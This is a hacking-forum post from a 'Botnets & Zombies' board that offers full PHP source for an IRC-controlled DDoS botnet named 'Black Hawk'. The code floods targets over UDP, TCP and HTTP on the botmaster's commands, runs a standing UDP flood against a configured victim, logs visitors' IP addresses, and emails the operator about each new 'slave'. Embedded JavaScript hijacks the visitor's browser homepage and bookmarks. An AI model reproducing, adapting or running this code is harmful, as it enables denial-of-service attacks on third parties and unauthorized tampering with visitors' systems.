Thursday, 2024-03-28, 5:00 PM
Welcome Guest

Sec_rity without U

Main | PHP version 2.0 | Black Hawk - Forum | Registration | Login | RSS
[ New messages · Members · Forum rules · Search · RSS ]
  • Page 1 of 1
  • 1
Forum » Hacks, Exploits & discussions » Botnets & Zombies » PHP version 2.0 | Black Hawk (PHP bot net VERSION 2.0)
PHP version 2.0 | Black Hawk
blackhawkDate: Wednesday, 2011-11-30, 8:26 AM | Message # 1
Private
Group: Checked
Messages: 15
Awards: 0
Reputation: 0
Status: Offline
Quote
<html>
<script type="text/javascript" language="JavaScript">
onClick="this.style.behavior='url(#default#homepage)';
this.setHomePage('http://YOURWEBSITE!!.com');
javascript:window.external. AddFavorite('http://YOURWEBSITE!!.com'', 'Free Music and Games')
</script>
<?php
/*

Simple PHP Botnet version 2
© By Dieteam Pcquad.de

*/

//start editing

//for notification:

$email = "youremail";
$server = ircserver.com;
$Port="6667";
$dns = "yourdnshostorip";
$nick="slave-";$willekeurig;
$willekeurig=mt_rand(0,3);
$nicknummer=mt_rand(100000,999999);
$Channel="#yourchannel";
$Channelpass="yourpwd";
$msg="Farewell.";
//this will attack your bots all the time the slave server (for example this is usefull if you are a longer time away so they attack a server without a botmaster (usually you will give the ddos command over the irc)
$target ="your victimserver";
//STOP EDITING!

set_time_limit(0);
$loop = 0; $verbonden = 0;
$verbinden = fsockopen($server, $Port);

while ($read = fgets($verbinden,512)) {

$read = str_replace("\n","",$read); $read = str_replace("\r","",$read);
$read2 = explode(" ",$read);

if ($loop == 0) {
fputs($verbinden,"nick $nick$nicknummer\n\n");
fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
}

if ($read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); }

if ($read2[1] == 251) {
fputs($verbinden,"join $Channel $Channelpass\n");
$verbonden++;
}

//READING AREA
if (eregi("bot-op",$read)) {
fputs($verbinden,"mode $Channel +o $read2[4]\n");
}

if (eregi("bot-deop",$read)) {
fputs($verbinden,"mode $Channel -o $read2[4]\n");
}

if (eregi("bot-quit",$read)) {
fputs($verbinden,"quit :$msg\n\n");
break;
}

if (eregi("bot-join",$read)) {
fputs($verbinden,"join $read2[4]\n");
}

if (eregi("bot-part",$read)) {
fputs($verbinden,"part $read2[4]\n");
}

if (eregi("ddos-udp",$read)) {
fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
$fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
if (!$fp)
{
//echo "$errstr ($errno)<br>\n"; //troep
exit;
}
else
{
$char = "a";
for($a = 0; $a < 9999999999999; $a++)
$data = $data.$char;

if(fputs ($fp, $data) )
fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
else
fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
}
}

if (eregi("ddos-tcp",$read)) {
fputs($verbinden,"part $read2[4]\n");
fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
$server = $read2[4];
$Port = $read2[5];

for($sockets = 0; $sockets < $read2[6]; $sockets++)
{
$verbinden = fsockopen($server, $Port);
}
}

if (eregi("ddos-http",$read)) {
fputs($verbinden,"part $read2[4]\n");
fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
$Webserver = $read2[4];
$Port = $read2[5];

$Aanvraag = "GET / HTTP/1.1\r\n";
$Aanvraag .= "Accept: */*\r\n";
$Aanvraag .= "Accept-Language: nl\r\n";
$Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
$Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$Aanvraag .= "Host: $read2[4]\r\n";
$Aanvraag .= "Connection: Keep-Alive\r\n\r\n";

for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
{
$DoS = fsockopen($Webserver, $Port);
fwrite($DoS, $Aanvraag);
fclose($DoS);
}
}
$loop++;

}

if (!$_GET['target'])
die('No Target IP specified!');

$sock = socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);

if(!$sock)
die(__LINE__);

$data='';

for ($i=0;$i<1400;$i++)
{
$data.=chr(rand(0,255));
}

while(true)
{
if (!socket_sendto($sock,$data,strlen($data),0,$target,9))
die(__LINE__);
echo('-');
}
$datei = "ips.txt";
//do not change
$serip= $_SERVER['REMOTE_ADDR'];
$comment = $_POST['comment'];
$name = $_POST['name'];
$email = $_POST['email'];
$zeiger = fopen($datei, "r+");
$alt = fread($zeiger, filesize($datei));
$datum = date("j.n.Y h:i:s A");
$comment = htmlspecialchars($comment);
$comment = stripslashes(nl2br($comment));
$meinung = "$serip <i>$datum</i><br><hr><br>";
rewind($zeiger);
if ($serip!=$dns) {
fputs($zeiger, "$meinung n $alt");
fclose($zeiger);
$sender = "PHP DDOS BOT";
$empfaenger = "$email";
$betreff = "New slave";
$text = "Hey you just have a new slave go to your irc channel ($server) $port $channel his nick is $nick and his ip is $serip" ;
mail($empfaenger, $betreff, $text,
"From: $sender");
} else {
echo "goodday my master <br><hr><br>";
readfile($datei);
}

?>


hope you like it
new features:

has a away function
-afk ddosing
-IP logging
-email notification
-automatic setting to default website
-automatic setting a bookmark
-dns request

you have to create a textfile called ips.txt
 
Forum » Hacks, Exploits & discussions » Botnets & Zombies » PHP version 2.0 | Black Hawk (PHP bot net VERSION 2.0)
  • Page 1 of 1
  • 1
Search: